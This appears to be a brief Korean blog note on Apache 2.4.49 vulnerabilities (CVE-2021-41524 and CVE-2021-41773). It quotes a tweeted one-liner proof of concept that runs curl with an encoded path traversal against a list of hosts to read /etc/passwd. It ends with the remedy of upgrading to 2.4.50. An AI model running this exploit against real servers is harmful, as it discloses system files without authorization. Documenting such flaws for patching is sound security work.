Apache 2.4.49 취약점
CVE-2021-41524 : null pointer dereference in h2 fuzzing (위험도)
CVE - CVE-2021-41524
20210920 Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
cve.mitre.org
CVE-2021-41773 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (위험도 높음)
CVE - CVE-2021-41773
20210929 Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
cve.mitre.org
https://twitter.com/HackerGautam/status/1445412108863041544
Rohit Gautam 🤘🏴☠️ on Twitter
“CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0
twitter.com
$host/cgi-bin/../../../../etc/passwd 이게 먹다니.... apache 무슨 일입니까,,,
대응방법 -> apache 2.4.50 으로 업데이트